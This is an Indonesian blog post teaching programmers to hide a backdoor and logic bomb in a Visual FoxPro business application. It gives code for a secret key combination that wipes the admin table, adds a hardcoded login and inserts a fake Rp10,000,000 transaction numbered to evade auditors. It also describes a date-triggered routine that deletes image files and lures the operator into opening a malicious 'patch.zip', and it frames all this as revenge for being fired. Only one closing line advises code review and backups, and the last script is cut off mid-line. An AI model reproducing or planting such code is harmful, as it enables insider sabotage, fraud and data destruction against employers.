Hacking Database Visual Foxpro

Wah baca judul di atas mesti anda membayangkan sesuatu yang sangar atau menantang, padahal sebenarnya ini hanyalah hoax yang penulis sebarkan hanya untuk bersenang-senang saja toh seandainya nanti dibuat untuk kejahatan bukan tanggung jawab saya. Mungkin banyak diantara kalian yang kuliah mengambil jurusan SI/SK atau Teknik Komputer tidak asing lagi dengan istilah "Visual Foxpro".

Visual FoxPro adalah bahasa pemrograman berorientasi objek dan prosedural dari Microsoft. Awalnya bahasa pemrograman ini dikenal dengan nama FoxBASE yang diluncurkan oleh Fox Software pada awal 1984. Fox Technologies kemudian bergabung dengan Microsoft pada 1992 sehingga di depan nama FoxBASE ditambahkan awalan "Visual".

Versi terakhir FoxPro (9.0) dapat berjalan pada sistem operasi Mac OS, DOS, Windows, dan Unix. Visual FoxPro 3.0, versi "Visual" pertama, akhirnya tersingkir karena hanya mendukung Mac OS dan Windows, dan versi berikutnya hanya mendukung Windows saja. Versi terkini Visual FoxPro adalah berdasarkan teknologi COM dan Microsoft telah menyatakan bahawa mereka tidak berniat untuk mencipta versi Microsoft .NET.

Penggunaan nya yang relatif gampang menjadikan banyak dipakai. Dalam hal ini penulis akan memberikan kelebihan dari foxpro yaitu pemanfaatan akses tombol yang berbahaya bagi tangan orang jahil, walaupun program tersebut sudah dalam bentuk program aplikasi program tersebut masih dapat diubah. Yang perlu digaris bawahi adalah program ini dibuat oleh anda sendiri. Kenapa? Karena kita harus tahu nama tabel, field dan tipe data yang dipakai. Jadi script yang akan dibuat ditambahkan pada program yang dibuat. Untuk percobaan, kita akan mencoba membuat suatu project sendiri. Project ini saya beri nama balihack dan dilengkapi dengan 3 buah tabel yaitu admin, hari dan transaksi. Tabel tsb jg dilengkapi dengan field fieldnya. Seperti pada gambar dibawah.



Setelah itu kita akan membuat satu buah form login. Akan dilihat seperti gambar dibawah ini.



Form ini merupakan form login untuk operator dari program yang kita buat. Form ini biasanya muncul sebelum menu utama muncul. Liat script yag telah dibuat :

inti dari program---program ini ditempatkan di form admin tersebut, di procedure KeyPress.
dengan menekan SHIFT+HOME maka semua eksekusi akan dijalankan. Program akan memanggil.
tabel admin, set safety off untuk mematikan keamanan ferifikasi dari foxpro dan isi dari tabel admin.
akan dihapus. Secara otomatis user akan ditambah dengan nama capil dan password balihack.

LPARAMETERS nKeyCode, nShiftAltCtrl
ON KEY LABEL CTRL+HOME SELECT admin
SET SAFETY OFF
ZAP
INSERT INTO ADMIN(nama_log,pass) VALUE ("capil","balihack")

ini merupakan program untuk melakukan auto increment pada field nomor transaksi.
jd gak terlalu penting, hanya untuk menghilangkan kecurigaan dari operator atau auditor jika memang ditempat anda bekerja ada autitnya. Agar transaksi tercatat sesuai dengan no.

Selanjutnya ---------->
SELECT transaksi
GO bottom
akhir= SUBSTR(no_tran,2,4)
akhir=VAL(akhir)
iF akhir == 0 then
nomornya = 'A0001'
ENDIF
IF akhir<9 AND akhir>=0
nomornya = 'A000'+ALLTRIM(STR(akhir+1))
ENDIF
IF akhir<99 AND akhir>=9
nomornya = 'A00'+ALLTRIM(STR(akhir+1))
ENDIF
IF akhir<999 AND akhir>=99
nomornya = 'A0'+ALLTRIM(STR(akhir+1))
ENDIF
IF akhir<9999 AND akhir>=999
nomornya = 'A'+ALLTRIM(STR(akhir+1))
ENDIF

program akan memanggil tabel transaksi, semua field akan diisi sesuai dengan keinginan kita dalam contoh ini no_tran akan diisi sesuai dengan aslinya dng mengambil nilai nomornya, nama capil dan saldo 10000000

SELECT transaksi
INSERT INTO transaksi(no_tran,pelanggan,saldo) VALUE
(nomornya,"capil","10000000")

Pencatat penghancuran selanjutnya akan dicatat dengan sedikit logika maka kita akan membuat suatu pencatatan waktu yang berlaku pada saat ini. Waktu tersebut akan disimpan di tabel hari.

SELECT hari
INSERT INTO hari(tgl) VALUE (DATE())

Mari kita lihat hasil program kita, jalankan program kemudian tekan SHIFT+HOME secara bersamaan. Apa yang terjadi, mari kita lihat gambar di bawah ini :

-----sebelum penekanan SHIFT+HOME ----


-----sesudah penekanan SHIFT+HOME ----


Setelah itu mari kita penghancuran yang kedua. Lihat script dibawah ini :

pertama program akan melihat isi tabel hari dan tanggal yang sekarang akan dicatat script ini ditempatkan di procedure INIT. Disinilah pentingnya kita menyimpan hari pada script diatas, secara otomatis program akan akan melakukan chekking apakah tanggal tersebut berbeda. Program ini akan bekerja keesokan harinya saat program dihidupkan pertama kali kita lanjutkan, jika tanggal yang sekarang lebih besar dari tanggal yang disimpan ditabel maka akan menampilkan pesan untuk memperbaiki program dan user diperintahkan untuk melakukan patch C:\WINDOWS\PATCH.ZIP, dan jika operator menekan YES maka kita patut bersyukur sebenarnya itu adalah social enginering untuk mengarahkan operator membuka program patch.zip yang telah kita simpan jauh2 hari sebelum program yang kita buat dioperasikan. Misalnya pada patch.zip itu kita isi virus gmn ya? Jahat sekali. script ini akan menghapus semua file berektension .JPG dan .GIF di folder
tempat kita menyimpan aplikasi ini, sehingga apabila program itu menggunakan gambar2 yang berektension tersebut akan terhapus. Kejam gak sih ini menurud kalian?

SELECT hari
n=DATE()
IF tgl

Semakin halus cara kerja kita semakin bagus. Misal kita lihat diatas semua nama user dan password kita hapus dan mengganti nama user dan password, tentu itu akan membuat curiga operator karena gak bisa login. Cara yang lebih halus yaitu membiarkan semua login seperti semula tetapi kita akan membuat suatu login dengan nama dan password yang kosong sehingga setiap orang yang tidak tau password pun dapat login. Ya, jika yang login itu baik, gimana jika jahat? Pada transaksi kita sudah menambah satu buah transaksi dengan nilai saldo Rp. 10.000.000 (nilai yang cukup banyak buat anak kos). Mungkin sedikit bagi perusahaan, gimana kalau kita ganti dengan nilai yang lebih besar misal Rp.100juta. saya yakin untuk beberapa saat keringat mereka akan mengucur deras karena terjadi kesalahan pembukuan.

Memang tidak dapat dipungkiri ada beberapa programer usil yang bekerja pada perusahaan atau instansi tertentu yg menggunakan cara ini. Kenapa mereka melakukan itu, mungkin alasan yang paling mendasar adalah balas dendam. Mereka takut bila suatu saat mereka dipecat, mereka tidak bisa memberi oleh oleh yg layak untuk perusahaan tsb,misal dng penghapusan transaksi atau menformat komputer mereka hanya dengan menekan beberapa tombol. Sambil bernyanyi programer yang dipecat akan kemeja operator dan menghidupkan komputer tsb. Dengan 2 tombol maka BOOM....BOOM...

“BERANI PECAT, AKU PERKOSA DATA KALIAN”

Mungkin itu MOTTO mereka, saya yakin anda tidak mau melakukan hal tersebut karena pekerjaan itu tidak ada baiknya. Saran saya untuk hal ini adalah sebelum program resmi dipakai sebaiknya cek dulu listing program tersebut dan backup selalu data anda tidak hanya pada satu tempat.